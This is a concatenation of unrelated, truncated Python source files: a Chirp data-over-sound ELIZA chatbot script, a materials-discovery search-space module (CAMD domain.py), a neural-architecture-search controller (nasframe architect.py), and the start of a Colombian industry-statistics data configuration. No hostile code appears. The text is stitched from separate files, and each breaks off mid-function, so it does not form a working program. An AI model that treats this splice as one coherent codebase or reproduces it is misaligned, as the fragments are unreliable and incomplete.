A device sends a message via audio. Another device listens to the audio signal,
decodes the message, and sends a response message via audio.
The two devices continue to communicate with each other over sound.
Preparation:
Install python3 and pip3. Install mic and speaker.
Install Chirp SDK for data-over-sound function
Install NLTK for natural language chat function
Download the python code and run
Chirp SDK https://developers.chirp.io/
NLTK: Natural Language Toolkit https://www.nltk.org/
"""
# nltk components
from __future__ import print_function
import nltk
from nltk.chat.util import Chat, reflections
# chirpsdk components
import argparse
import sys
import time
from chirpsdk import ChirpSDK, CallbackSet, CHIRP_SDK_STATE
# chat data is a table of response pairs.
# Each pair consists of a regular expression and a list of responses
# with group-macros labelled as %1, %2.
pairs = (
(
r'I need (.*)',
(
"01234567890123456789012345678901",
"Why do you need !@#?",
"Would it really help you?",
"Are you sure you need !@#?",
),
),
(
r'Why don\'t you (.*)',
(
"Do you think I don't !@#?",
"Perhaps I will !@#.",
"Do you want me to !@#?",
),
),
(
r'Why can\'t I (.*)',
(
"Do you think you can !@#?",
"If you could, what would you do?",
"I don't know, why can't you?",
"Have you really tried?",
),
),
(
r'I can\'t (.*)',
(
"How do you know you can't !@#?",
"Perhaps you could if you tried.",
"What do you need to !@#?",
),
),
(
r'I am (.*)',
(
"Is that why you came to me?",
"How long have you been !@#?",
"How do you feel about that?",
),
),
(
r'I\'m (.*)',
(
"How does it feel beng !@#?",
"Do you enjoy being !@#?",
"Why do you tell me you're !@#?",
"Why do you think you're !@#?",
),
),
(
r'Are you (.*)',
(
"Why does it matter to you?",
"Do you prefer if I'm not that?",
"Perhaps you think I am !@#.",
"I may be !@#, what do you think?",
),
),
(
r'What (.*)',
(
"Why do you ask?",
"How would an answer help you?",
"What do you think?",
),
),
(
r'How (.*)',
(
"How do you suppose?",
"Perhaps you can answer yourself",
"What is it you're really asking?",
),
),
(
r'Because (.*)',
(
"Is that the real reason?",
"What other reasons come to mind?",
"Does it apply to anything else?",
"If so, what else must be true?",
),
),
(
r'(.*) sorry (.*)',
(
"No apology is needed.",
"How do you feel about that?",
),
),
(
r'Hello(.*)',
(
"Hello, I'm glad you drop by",
"Hi there... how are you today?",
"How are you feeling today?",
),
),
(
r'I think (.*)',
(
"Do you doubt !@#?",
"Do you really think so?",
"But you're not sure !@#?"
),
),
(
r'(.*) friend (.*)',
(
"Tell me more about your friends",
"What comes to mind?",
"Why don't you tell me more?",
),
),
(
r'Yes',
(
"You seem quite sure.",
"OK, but can you elaborate a bit?",
),
),
(
r'(.*) computer(.*)',
(
"Are you talking about me?",
"Does it seem strange to you?",
"How do computers make you feel?",
"Do you feel threatened?",
),
),
(
r'Is it (.*)',
(
"Do you think it is?",
"Perhaps, what do you think?",
"If so, what would you do?",
"It could be !@#.",
),
),
(
r'It is (.*)',
(
"You seem very certain.",
"If not, how would you feel?",
),
),
(
r'Can you (.*)',
(
"What makes you think I can't?",
"If I could !@#, so what?",
"Why do you ask?",
),
),
(
r'Can I (.*)',
(
"!@#?",
"Do you want to !@#?",
"If you could, would you?",
),
),
(
r'You are (.*)',
(
"Why do you think I am !@#?",
"Does it please you to think so?",
"Perhaps you like me to be so",
"Are you talking about yourself?",
),
),
(
r'You\'re (.*)',
(
"!@#?",
"You are !@#?",
"Are we talking about you, or me?",
),
),
(
r'I don\'t (.*)',
("Don't you really !@#?", "Why don't you !@#?", "Do you want to !@#?"),
),
(
r'I feel (.*)',
(
"Good, tell me more",
"Do you often feel that?",
"When do you usually feel it?",
"When you feel it, what do you do",
),
),
(
r'I have (.*)',
(
"Why do you have !@#?",
"what, !@#?",
"What will you do next?",
),
),
(
r'I would (.*)',
(
"Could you explain why?",
"Why would you?",
"Who else knows that?",
),
),
(
r'Is there (.*)',
(
"what, !@#?",
"It's likely",
"Would you like about it?",
),
),
(
r'My (.*)',
(
"I see, !@#.",
"Why !@#?",
"How do you feel?",
),
),
(
r'You (.*)',
(
"Let's talk about ou, not me.",
"Why do you care?",
"You are !@#?",
),
),
(r'Why (.*)', ("Why don't you tell me why?", "Why do you think so?")),
(
r'I want (.*)',
(
"What would it mean to you?",
"Why do you want it?",
"What would you do if you had it?",
"What, !@#?",
),
),
(
r'(.*) mother(.*)',
(
"Tell me more about your mother.",
"How is your mom?",
"How do you feel about your mom?",
"How does it feel?",
"Good family is important.",
),
),
(
r'(.*) father(.*)',
(
"Tell me more about your dad.",
"How does your dad make you feel?",
"How do you feel about your dad?",
"Dad?",
"Do you have trouble with dad?",
),
),
(
r'(.*) child(.*)',
(
"Did you have a child?",
"What is your childhood memory?",
"Do you remember any dreams?",
"Did other children tease you?",
"What do you think?",
),
),
(
r'(.*)\?',
(
"Why do you ask that?",
"Please think.",
"The answer lies within yourself?",
"Why don't you tell me?",
),
),
(
r'quit',
(
"Thank you for talking with me.",
"Good-bye.",
"Thank you, Have a good day!",
),
),
(
r'(.*)',
(
"Please tell me more.",
"Let's talk about your feelings.",
"Can you elaborate on that?",
"Why !@#?",
"I see.",
"Very interesting.",
"!@#.",
"I see. What does that tell you?",
"How does that make you feel?",
"How does it feel saying that?",
),
),
)
# create an eliza-like chat
eliza_chatbot = Chat(pairs, reflections)
# chirptalk segment
rdata = bytearray(32)
payloadlength = 0
class Callbacks(CallbackSet):
def on_state_changed(self, previous_state, current_state):
""" Called when the SDK's state has changed """
# print('State changed from {} to {}'.format(
# CHIRP_SDK_STATE.get(previous_state),
# CHIRP_SDK_STATE.get(current_state)))
def on_sending(self, payload, channel):
""" Called when a chirp has started to be transmitted """
# print('Sending: {data} [ch{ch}]'.format(
# data=list(payload), ch=channel))
def on_sent(self, payload, channel):
""" Called when the entire chirp has been sent """
# print('Sent: {data} [ch{ch}]'.format(
# data=list(payload), ch=channel))
def on_receiving(self, channel):
""" Called when a chirp frontdoor is detected """
# print('Receiving data [ch{ch}]'.format(ch=channel))
def on_received(self, payload, channel):
"""
Called when an entire chirp has been received.
Note: A payload of None indicates a failed decode.
"""
global payloadlength
if payload is None:
print('Decode failed!')
else:
# print('Received: {data} [ch{ch}]'.format(
# data=list(payload), ch=channel))
# load up a bytearray "rdata[]" with the received payload
payloadlength = len(payload)
# print(payloadlength)
i = 0
for x in payload:
rdata[i] = x
i+=1
def main(block_name, input_device, output_device,
block_size, sample_rate, channel):
global payloadlength
# Initialise Chirp SDK
sdk = ChirpSDK(block=block_name)
print(str(sdk))
print('Protocol: {protocol} [v{version}]'.format(
protocol=sdk.protocol_name,
version=sdk.protocol_version))
print(sdk.audio.query_devices())
# Configure audio
sdk.audio.input_device = input_device
sdk.audio.output_device = output_device
sdk.audio.block_size = block_size
sdk.input_sample_rate = sample_rate
sdk.output_sample_rate = sample_rate
# Set callback functions
sdk.set_callbacks(Callbacks())
# Set transmission channel for multichannel protocols
if args.channel is not None:
if args.channel >= sdk.channel_count:
raise ValueError('Channel %d is not available' % args.channel)
# print('Writing to channel %d' % args.channel)
sdk.transmission_channel = args.channel
# Send a message
# [we don't do random payload in this code] Generate random payload and send
# payload = sdk.random_payload()
# start from the user-supplied message in main args
message = args.message.encode('utf-8')
payload = sdk.new_payload(message)
sdk.start(send=True, receive=True)
sdk.send(payload)
tom0 = 0
waittime = 0
try:
# Process audio streams
| |
<reponame>JosephMontoya-TRI/CAMD<filename>camd/domain.py<gh_stars>0
# Copyright Toyota Research Institute 2019
"""
Preliminary module for determining search spaces
"""
import pandas as pd
import abc
import warnings
import itertools
import numpy as np
from protosearch.build_bulk.oqmd_interface import OqmdInterface
from pymatgen.io.ase import AseAtomsAdaptor
from pymatgen import Composition, Element
from matminer.featurizers.base import MultipleFeaturizer
from matminer.featurizers.composition import (
ElementProperty,
Stoichiometry,
ValenceOrbital,
IonProperty,
)
from matminer.featurizers.structure import (
SiteStatsFingerprint,
StructuralHeterogeneity,
ChemicalOrdering,
StructureComposition,
MaximumPackingEfficiency,
)
class DomainBase(abc.ABC):
"""
Domains combine generation and featurization and prepare
the search space for CAMD Loop.
"""
@abc.abstractmethod
def candidates(self):
"""
Primary method for every Domain to provide candidates.
Returns:
(pandas.DataFrame): features for generated hypothetical
structures. The Index of dataframe should be the
unique ids for the structures.
"""
pass
@property
@abc.abstractmethod
def bounds(self):
"""
Returns:
list: names of dimensions of the search space.
"""
pass
@abc.abstractmethod
def sample(self, num_samples):
"""
Abstract method for sampling from created domain
Args:
num_samples:
Returns:
"""
pass
@property
def bounds_string(self):
"""
Property representation of search space bounds
Returns:
(str): representation of search space bounds, e.g.
"Ir-Fe-O" or "x1-x2-x3"
"""
return "-".join(self.bounds)
class StructureDomain(DomainBase):
"""
Provides machine learning ready candidate domains (search spaces) for
hypothetical structures. If scanning an entire system, use the
StructureDomain.from_bounds method. If scanning for formula(s),
provide a list of formulas directly to StructureDomain.
Once the StructureDomain is initialized, the method candidates returns
a fully-featurized hypothetical materials set subject to n_max_atoms.
"""
def __init__(self, formulas, n_max_atoms=None):
"""
Args:
formulas ([str]): list of chemical formulas to create new
material candidates.
n_max_atoms (int): number of max atoms
"""
self.formulas = formulas
self.n_max_atoms = n_max_atoms
self.features = None
self._hypo_structures = None
@classmethod
def from_bounds(
cls,
bounds,
n_max_atoms=None,
charge_balanced=True,
create_subsystems=False,
**kwargs
):
"""
Convenience constructor that delivers an ML-ready domain
from defined chemical boundaries.
Args:
bounds ([str]): list of element strings corresponding to bounds of
the composition space, e. g. ['Fe', 'O', 'N']
n_max_atoms (int): maximum number of atoms in the generated
formulae
charge_balanced (bool): whether to filter generated formulae by
charge balancing the respective elements according to allowed
oxidation states
create_subsystems (bool): TODO - what is this?
**kwargs: arguments to pass to formula creator
"""
formulas = create_formulas(
bounds,
charge_balanced=charge_balanced,
create_subsystems=create_subsystems,
**kwargs
)
print("Generated chemical formulas: {}".format(formulas))
return cls(formulas, n_max_atoms)
@property
def bounds(self):
"""
Method to get bounds from StructureDomain
Returns:
([]): list of dimensions in search space
"""
bounds = set()
for formula in self.formulas:
bounds = bounds.union(Composition(formula).as_dict().keys())
return bounds
def get_structures(self):
"""
Method to call protosearch structure generation
"""
if self.formulas:
print("Generating hypothetical structures...")
self._hypo_structures = get_structures_from_protosearch(self.formulas)
print(
"Generated {} hypothetical structures".format(len(self.hypo_structures))
)
else:
raise ValueError("Need formulas to create structures")
@property
def hypo_structures(self):
"""
Returns (dataframe): Hypothetical structures generated by
protosearch, filtered by n_max_atoms
"""
if self._hypo_structures is None:
self.get_structures()
if self.n_max_atoms:
n_max_filter = [
i.num_sites <= self.n_max_atoms
for i in self._hypo_structures["structure"]
]
if self._hypo_structures is not None:
return self._hypo_structures[n_max_filter]
else:
return None
else:
return self._hypo_structures
@property
def hypo_structures_dict(self):
"""
Returns:
(dict): Hypothetical structures generated by
protosearch, filtered by n_max_atoms
"""
return self.hypo_structures["structure"].to_dict()
@property
def compositions(self):
"""
Returns:
(list): Compositions of hypothetical structures generated.
"""
if self.hypo_structures is not None:
return [s.composition for s in self.hypo_structures]
else:
warnings.warn("No stuctures available.")
return []
@property
def formulas_with_valid_structures(self):
"""
Quick method to filter formulas with valid structures
Returns:
([str]): list of formulas with corresponding valid
structures
"""
# Note the redundancy here is for pandas to work
if self.valid_structures is not None:
return [s.composition.formula for s in self.valid_structures["structure"]]
else:
warnings.warn("No structures available yet.")
return []
def featurize_structures(self, featurizer=None, **kwargs):
"""
Featurizes the hypothetical structures available from
hypo_structures method. Hypothetical structures for which
featurization fails are removed and valid structures are
made available as valid_structures
Args:
featurizer (Featurizer): A MatMiner Featurizer.
Defaults to MultipleFeaturizer with PRB Ward
Voronoi descriptors.
**kwargs (dict): kwargs passed to featurize_many
method of featurizer.
Returns:
(pandas.DataFrame): features
"""
# Note the redundancy here is for pandas to work
if self.hypo_structures is None:
warnings.warn("No structures available. Generating structures.")
self.get_structures()
print("Generating features")
featurizer = (
featurizer
if featurizer
else MultipleFeaturizer(
[
SiteStatsFingerprint.from_preset(
"CoordinationNumber_ward-prb-2017"
),
StructuralHeterogeneity(),
ChemicalOrdering(),
MaximumPackingEfficiency(),
SiteStatsFingerprint.from_preset(
"LocalPropertyDifference_ward-prb-2017"
),
StructureComposition(Stoichiometry()),
StructureComposition(ElementProperty.from_preset("magpie")),
StructureComposition(ValenceOrbital(props=["frac"])),
StructureComposition(IonProperty(fast=True)),
]
)
)
features = featurizer.featurize_many(
self.hypo_structures["structure"], ignore_errors=True, **kwargs
)
n_species, formula = [], []
for s in self.hypo_structures["structure"]:
n_species.append(len(s.composition.elements))
formula.append(s.composition.formula)
self._features_df = pd.DataFrame.from_records(
features, columns=featurizer.feature_labels()
)
self._features_df.index = self.hypo_structures.index
self._features_df["N_species"] = n_species
self._features_df["Composition"] = formula
self._features_df["structure"] = self.hypo_structures["structure"]
self.features = self._features_df.dropna(axis=0, how="any")
self.features = self.features.reindex(sorted(self.features.columns), axis=1)
self._valid_structure_labels = list(self.features.index)
self.valid_structures = self.hypo_structures.loc[self._valid_structure_labels]
print(
"{} out of {} structures were successfully featurized.".format(
self.features.shape[0], self._features_df.shape[0]
)
)
return self.features
def candidates(self, include_composition=True):
"""
This is the recommended convenience method that returns
a fully-featurized set of hypothetical structures.
Args:
include_composition (bool): Adds a column named "formula"
to the dataframe.
Returns:
(pandas.DataFrame) feature vectors of valid
hypothetical structures.
"""
if self._hypo_structures is None:
self.get_structures()
if self.features is None:
self.featurize_structures()
if include_composition:
return self.features
else:
return self.features.drop("Composition", axis=1)
def sample(self, num_samples):
"""
Method for sampling domain
Args:
num_samples (int): number of samples to return
Returns:
(pd.DataFrame): dataframe corresponding to sampled
domain with num_samples candidates
"""
self.candidates().sample(num_samples)
def get_structures_from_protosearch(formulas, source="icsd", db_interface=None):
"""
Calls protosearch to get the hypothetical structures.
Args:
formulas ([str]): list of chemical formulas from which
to generate candidate structures
source (str): project name in OQMD to be used as source.
Defaults to ICSD.
db_interface (DbInterface): interface to OQMD database
by default uses the one pulled from data.matr.io
Returns:
(pandas.DataFrame) hypothetical pymatgen structures
generated and their unique ids from protosearch
"""
if db_interface is None:
db_interface = OqmdInterface(source)
dataframes = [
db_interface.create_proto_data_set(chemical_formula=formula)
for formula in formulas
]
_structures = pd.concat(dataframes)
# Drop bad structures
_structures.dropna(axis=0, how="any", inplace=True)
# conversion to pymatgen structures
ase_adap = AseAtomsAdaptor()
pmg_structures = [
ase_adap.get_structure(_structures.iloc[i]["atoms"])
for i in range(len(_structures))
]
_structures["structure"] = pmg_structures
# This is for compatibility with Mc1, which doesn't allow
# underscores
structure_uids = [
_structures.iloc[i]["structure_name"].replace('_', '-')
for i in range(len(_structures))
]
_structures.index = structure_uids
return _structures
def get_stoichiometric_formulas(n_components, grid=None):
"""
Generates anonymous stoichiometric formulas for a set
of n_components with specified coefficients
Args:
n_components (int): number of components (dimensions)
grid (list): a range of integers
Returns:
(list): unique stoichiometric formula from an
allowed grid of integers.
"""
grid = grid if grid else list(range(1, 8))
args = [grid for _ in range(n_components)]
stoics = np.array(list(itertools.product(*args)))
fracs = stoics.astype(float) / np.sum(stoics, axis=1)[:, None]
_, indices, counts = np.unique(fracs, axis=0, return_index=True, return_counts=True)
return stoics[indices]
def create_formulas(
bounds,
charge_balanced=True,
oxi_states_extend=None,
oxi_states_override=None,
all_oxi_states=False,
grid=None,
create_subsystems=False,
):
"""
Creates a list of formulas given the bounds of a chemical space.
TODO:
- implement create_subsystems
Args:
bounds ([str]): list of elements to bound the space
charge_balanced (bool): whether to balance oxidations
states in the generated formulae
oxi_states_extend ({}): dictionary of {element: [int]}
where the value is the added oxidation state to be
included
oxi_states_override ({str: int}): override for oxidation
states, see Composition.oxi_state_guesses
all_oxi_states ({str: int): global config for oxidation
states, see Composition.oxi_state_guesses
grid ([]): list of integers to use for coefficients
create_subsystems (bool): whether to create formulas
for sub-chemical systems, e. g. for Sr-Ti-O,
whether to create Ti-O and Sr-O
Returns:
([str]): list of chemical formulas
"""
if create_subsystems:
raise NotImplementedError("Create subsystems not yet implemented.")
stoichs = get_stoichiometric_formulas(len(bounds), grid=grid)
formulas = []
for f in stoichs:
f_ = ""
for i in range(len(f)):
f_ += bounds[i] + f.astype(str).tolist()[i]
formulas.append(f_)
if charge_balanced:
charge_balanced_formulas = []
if oxi_states_extend:
oxi_states_override = oxi_states_override if oxi_states_override else {}
for element, states in oxi_states_extend.items():
states = states if isinstance(states, list) else [states]
_states = states + list(Element[element].common_oxidation_states)
if element in oxi_states_override:
oxi_states_override[element] += states
else:
oxi_states_override[element] = _states
for formula in formulas:
c = Composition(formula)
if c.oxi_state_guesses(
oxi_states_override=oxi_states_override, all_oxi_states=all_oxi_states
):
charge_balanced_formulas.append(formula)
return charge_balanced_formulas
else:
return formulas
def heuristic_setup(elements):
"""
Helper function to setup a default structure_domain
Args:
elements ([str]): list of elements to use to
generate formulae
Returns:
(int): maximum coefficient for element set
(bool): whether or not charge balancing should be used
"""
grid_defaults = {2: 5, 3: 5}
n_comp = len(elements)
_g = grid_defaults.get(n_comp, 4)
# Charge balance ionic compounds
if {"O", "Cl", "F", "S", | |
<filename>nasframe/architect.py
from nasframe.utils.misc import make_dirs, add_if_doesnt_exist, add_increment
from nasframe.utils.torch import wrap
from nasframe.searchspaces import SearchSpace
from torch.distributions import Categorical
from collections import defaultdict
from os.path import join, exists
import torch.nn as nn
import torch
import copy
class Architect(nn.Module):
"""
Architect neural network.
Args:
search_space (SearchSpace): search space to which this architect instance belongs
state_dims (tuple): graph encoder cell dimensions
cell_type (str): 'lstm' or 'gru'; graph encoder cell type
"""
def __init__(self, search_space, state_dims=(128, 128), cell_type='LSTM'):
super().__init__()
self.search_space = copy.deepcopy(search_space)
self.search_space.reset()
self.cells = []
cell = nn.LSTMCell if cell_type.lower() == 'lstm' else nn.GRUCell
for i, d in enumerate(state_dims[:-1]):
self.cells.append(cell(d, state_dims[i+1]))
self.cells = nn.ModuleList(self.cells)
self.embedding_index = {'state_zero': 0}
self.policies = {}
self.values = {}
self.initialize(self.search_space, [])
self.embedding = nn.Embedding(len(self.embedding_index), state_dims[0])
self._policy = nn.ModuleList(list(self.policies.values()))
self._values = nn.ModuleList(list(self.values.values()))
@property
def is_cuda(self):
"""
Returns bool value, indicating whether this architect is located on a CUDA device.
"""
return next(self.parameters()).is_cuda
@property
def device(self):
"""
Returns ``torch.Device`` on which this architect is located.
"""
return next(self.parameters()).device
def reset(self):
"""
Initializes all parameters.
"""
for p in self.parameters():
if p.dim() > 1:
nn.init.xavier_normal_(p)
else:
nn.init.constant_(p, 0)
def init_hidden(self, num_samples):
"""
Initializes hidden by passing :math:`state_0` embedding and
zero-initialized hidden state to graph encoder
"""
states = []
for cell in self.cells:
num_states = 1 + 1*isinstance(cell, nn.LSTMCell)
zeros = wrap(torch.zeros(num_samples, cell.hidden_size), self.device)
states.append(tuple([zeros.clone()]*num_states))
input = self.embedding(wrap([0], self.device, dtype=torch.long))
states = self(input, states)
return states
def save(self, prefix='./', name=None, include_space=False):
"""
Saves architect to a file.
Args:
prefix (str): prefix directory of a future save
name (str): save name
include_space (bool): whether to save the search space along with this architect instance
Returns:
str: path to which architect was saved (``prefix``/architect/``name``.pth)
"""
name = name or 'unnamed'
filename = f'{name}.pth'
prefix = join(prefix, 'architect')
if not exists(prefix): make_dirs(prefix)
path = join(prefix, filename)
space = self.search_space
if not include_space:
self.search_space = None
torch.save(self, path)
self.search_space = space
return path
def forward(self, input, hidden, key=None):
"""
Perform a forward path through graph encoder.
Returns:
new hidden state if key is None
else tuple of (logits, values, hidden)
"""
for cell_id, cell in enumerate(self.cells):
hidden[cell_id] = cell(input, hidden[cell_id])
if not isinstance(hidden[cell_id], (list, tuple)):
hidden[cell_id] = [hidden[cell_id]]
input = hidden[cell_id][0]
if key is not None:
logits = self.policies[key](hidden[-1][0])
values = self.values[key](hidden[-1][0])
return logits, values, hidden
return hidden
def act(self, inputs, hidden, explore, key, output=None, pick=None):
"""
Get action given encoded graph predicted to the moment.
Args:
inputs (torch.Tensor): encoded graph representation
explore(bool): whether to explore or exploit only
hidden (list): list of encoder cell(s) hidden states
key (str): key corresponding to policy and value layers
output (defaultdict(list), optional): if provided, chosen logprobs, chosen values and
entropies will be appended to those lists, instead of being returned
pick (int, optional): index of action to pick instead of sampling or argmax.
Returns:
action, hidden state, chosen logprobs, chosen values, entropies
"""
assert key is not None, '`key` must not be None for act. ' \
'If you want to update hidden only, call `forward` instead'
logits, values, hidden = self(inputs, hidden, key)
distribution = Categorical(logits=logits)
if pick is not None:
assert pick < logits.size(1)
action = wrap([pick], self.device, dtype=torch.long)
elif explore:
action = distribution.sample()
else:
action = distribution.probs.max(1)[1]
chosen_logs = distribution.log_prob(action).unsqueeze(1)
chosen_values = values.gather(1, action.unsqueeze(1))
entropies = distribution.entropy()
if output is not None:
assert isinstance(output, defaultdict) and output.default_factory == list, \
'`output` must be a defaultdict with `list` default_factory.'
output['logprob'].append(chosen_logs)
output['values'].append(chosen_values)
output['entropies'].append(entropies)
return action, hidden
return action, hidden, chosen_logs, chosen_values, entropies
def sample(self, explore=True):
"""
Samples a graph description, using current policy.
Args:
explore: whether to explore or exploit only.
Returns:
tuple: sampled graph, log probabilities and predicted
values of chosen actions, entropies of output distributions
"""
output = defaultdict(list)
representations = {}
description = {}
hidden = self.init_hidden(1)
self._subsample(hidden, explore, self.search_space, [], representations, output, description)
return (description, torch.cat(output['logprob']).transpose(0, 1),
torch.cat(output['values']), torch.cat(output['entropies']))
def evaluate_description(self, description):
"""
Picks described actions in order to obtain log probabilities, predicted values
and the entropies of output distributions
Args:
description (dict): description to evaluate
Returns:
tuple: sampled graph, log probabilities and predicted
values of chosen actions, entropies of output distributions
"""
description = copy.deepcopy(description)
output = defaultdict(list)
representations = {}
hidden = self.init_hidden(1)
self._subsample(hidden, False, self.search_space, [], representations, output, description)
return (description, torch.cat(output['logprob']).transpose(0, 1),
torch.cat(output['values']), torch.cat(output['entropies']))
def _subsample(self, hidden, explore, search_space, names, representations, output, description, outer_i=None):
"""
The recursive workhorse of `sample` method.
Args:
hidden (list): previous encoder hidden state
explore (bool): whether to explore the search/action space or exploit only
search_space (SearchSpace): current level of search space
names (list): names of search spaces up to current level
output (defaultdict(list), optional): dict of lists to append outputs to
description (dict): description being generated
outer_i (int): outer iteration ordinal (used in recursion, `None` on depth `0`)
Returns:
list: next hidden state
"""
name = search_space.name
names = copy.deepcopy(names)
names.append(name)
# Those checks were introduced to reuse this method to evaluate model output for already existing description.
if description.get(name) is None:
description[name] = {}
# region num inner prediction
num_inner = self.search_space.eval_(search_space.num_inner, **locals())
# region forcing facilitation
if description.get(f'num_{name}') is None:
forced_inner = self.search_space.eval_(search_space.forced_num_inner, **locals())
max_available = max(num_inner) if isinstance(num_inner, (list, tuple)) else num_inner
assert forced_inner is None or isinstance(forced_inner, int) and 0 < forced_inner <= max_available
if forced_inner is not None:
try: forced_inner = num_inner.index(forced_inner)
except ValueError:
raise ValueError(f'Number of inner search spaces "{forced_inner}" '
'is not present in original search space.')
else:
forced_inner = num_inner.index(description[f'num_{name}'])
# endregion
index = self.embedding_index[f'{name}_start']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
if len(num_inner) > 1:
key = f'{"_".join(names[:-1])}_{len(num_inner)}_{name}s'
action, hidden = self.act(input, hidden, explore, key, output, forced_inner)
num_inner = num_inner[action.item()]
else:
hidden = self(input, hidden)
num_inner = num_inner[forced_inner] if forced_inner is not None else num_inner[0]
if description.get(f'num_{name}') is None:
description[f'num_{name}'] = num_inner
# endregion
# region inner space prediction
index = self.embedding_index[f'{num_inner}_{name}s']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
encoded_flag = False
for i in range(int(num_inner)):
if description[name].get(i) is None:
description[name][i] = {}
if isinstance(search_space.inner, dict):
for k, v in search_space.inner.items():
v = self.search_space.eval_(v, **locals())
key = f'{"_".join(names[:-1])}_{len(v)}_{k}s'
if isinstance(v, (list, tuple)) and len(v) > 1:
pick = description[name][i].get(k)
if pick is not None:
try: pick = v.index(pick)
except ValueError:
raise ValueError(f'Point "{pick}" is not present in '
f'{k} dimension of the search space.')
action, hidden = self.act(input, hidden, explore, key, output, pick)
choice = v[action.item()]
if pick is None: description[name][i][k] = choice
else: assert choice == description[name][i][k]
if k == 'id':
if choice in representations:
input = representations[choice]
continue
index = self.embedding_index[f'{k}_{choice}']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
else:
if description[name][i].get(k) is None:
description[name][i][k] = v[0]
else: assert v[0] == description[name][i][k]
else:
assert isinstance(search_space.inner, (list, tuple, SearchSpace)), \
'Inner search space must be either dict, SearchSpace or list of SearchSpaces.'
if not encoded_flag:
hidden = self(input, hidden)
encoded_flag = True
spaces = [search_space.inner] if isinstance(search_space.inner, SearchSpace) else search_space.inner
for space in spaces:
input = self._subsample(hidden, explore, space, names, representations,
output, description[name][i], i)
hidden = self(input[-1][0], hidden)
index = self.embedding_index[f'{name}_inner_done']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
# endregion
# region outer keys prediction
for k, v in search_space.outer.items():
v = self.search_space.eval_(v, **locals())
key = f'{"_".join(names[:-1])}_{len(v)}_{k}s'
if isinstance(v, (list, tuple)) and len(v) > 1:
pick = description.get(k)
if pick is not None:
try: pick = v.index(pick)
except ValueError:
raise ValueError(f'Point "{pick}" is not present in '
f'{k} dimension of the search space.')
action, hidden = self.act(input, hidden, explore, key, output, pick)
choice = v[action.item()]
if pick is None: description[k] = choice
else: assert choice == description[k]
if k == 'id':
if choice in representations:
input = representations[choice]
continue
index = self.embedding_index[f'{k}_{choice}']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
else:
if description[name][i].get(k) is None:
description[name][i][k] = v[0]
else: assert v[0] == description[name][i][k]
# endregion
index = self.embedding_index[f'{name}_end']
index = wrap([index], self.device, dtype=torch.long)
input = self.embedding(index)
hidden = self(input, hidden)
if len(names) > 2:
repr_key = f'{names[-2]}' if outer_i is | |
hook_industry(df):
df = df.drop_duplicates(["location", "industry", "year"])
df = df[df.location.notnull()]
df = df[df.year.between(YEAR_MIN_INDUSTRY, YEAR_MAX_INDUSTRY)]
return df
def industry4digit_country_read():
df = pd.read_hdf(prefix_path("Industries/industries_all.hdf"), "data")
df["country_code"] = "COL"
return df
industry4digit_country = {
"read_function": industry4digit_country_read,
"field_mapping": {
"country_code": "location",
"p_code": "industry",
"year": "year",
"all_p_emp": "employment",
"all_p_wage": "wages",
"all_p_wagemonth": "monthly_wages",
"all_p_est": "num_establishments",
"all_p_pci": "complexity"
},
"hook_pre_merge": hook_industry,
"classification_fields": {
"location": {
"classification": location_classification,
"level": "country"
},
"industry": {
"classification": industry_classification,
"level": "class"
},
},
"digit_padding": {
"location": 1,
"industry": 4
},
"facet_fields": ["location", "industry", "year"],
"facets": {
("industry_id", "year"): {
"complexity": first
},
("location_id", "industry_id", "year"): {
"employment": first,
"wages": first,
"monthly_wages": first,
"num_establishments": first,
}
}
}
industry4digit_department = {
"read_function": lambda: pd.read_hdf(prefix_path("Industries/industries_state.hdf"), "data"),
"field_mapping": {
"state_code": "location",
"p_code": "industry",
"year": "year",
"state_p_emp": "employment",
"state_p_wage": "wages",
"state_p_wagemonth": "monthly_wages",
"state_p_est": "num_establishments",
"state_p_rca": "rca",
"state_p_distance_flow": "distance",
"state_p_cog_flow_pred": "cog",
"state_all_coi_flow_pred": "industry_coi",
"all_p_pci": "complexity",
"state_all_eci": "industry_eci"
},
"hook_pre_merge": hook_industry,
"classification_fields": {
"location": {
"classification": location_classification,
"level": "department"
},
"industry": {
"classification": industry_classification,
"level": "class"
},
},
"digit_padding": {
"location": 2,
"industry": 4
},
"facet_fields": ["location", "industry", "year"],
"facets": {
("location_id", "year"): {
"employment": sum_group,
"wages": sum_group,
"monthly_wages": first,
"num_establishments": sum_group,
"industry_eci": first,
"industry_coi":first,
},
("industry_id", "year"): {
"employment": sum_group,
"wages": sum_group,
"monthly_wages": sum_group,
"num_establishments": sum_group,
"complexity": first
},
("location_id", "industry_id", "year"): {
"employment": first,
"wages": first,
"monthly_wages": first,
"num_establishments": first,
"distance": first,
"cog": first,
"rca": first
}
}
}
def hook_industry4digit_msa(df):
df = hook_industry(df)
df.location = df.location.astype(int).astype(str).str.zfill(5) + "0"
return df
industry4digit_msa = {
"read_function": lambda: pd.read_hdf(prefix_path("Industries/industries_msa.hdf"), "data"),
"hook_pre_merge": hook_industry4digit_msa,
"field_mapping": {
"msa_code": "location",
"p_code": "industry",
"year": "year",
"msa_p_emp": "employment",
"msa_p_wage": "wages",
"msa_p_wagemonth": "monthly_wages",
"msa_p_est": "num_establishments",
"msa_p_rca": "rca",
"msa_p_distance_flow": "distance",
"msa_p_cog_flow_pred": "cog",
"msa_all_coi_flow_pred": "industry_coi",
"all_p_pci": "complexity",
"msa_all_eci": "industry_eci"
},
"classification_fields": {
"location": {
"classification": location_classification,
"level": "msa"
},
"industry": {
"classification": industry_classification,
"level": "class"
},
},
"digit_padding": {
"industry": 4
},
"facet_fields": ["location", "industry", "year"],
"facets": {
("location_id", "year"): {
"employment": sum_group,
"wages": sum_group,
"monthly_wages": first,
"num_establishments": sum_group,
"industry_eci": first,
"industry_coi": first,
},
("industry_id", "year"): {
"employment": sum_group,
"wages": sum_group,
"complexity": first
},
("location_id", "industry_id", "year"): {
"employment": first,
"wages": first,
"monthly_wages": first,
"num_establishments": first,
"distance": first,
"cog": first,
"rca": first
}
}
}
industry4digit_municipality = {
"read_function": lambda: pd.read_hdf(prefix_path("Industries/industries_muni.hdf"), "data"),
"hook_pre_merge": hook_industry,
"field_mapping": {
"muni_code": "location",
"p_code": "industry",
"year": "year",
"muni_p_emp": "employment",
"muni_p_wage": "wages",
"muni_p_wagemonth": "monthly_wages",
"muni_p_est": "num_establishments",
},
"classification_fields": {
"location": {
"classification": location_classification,
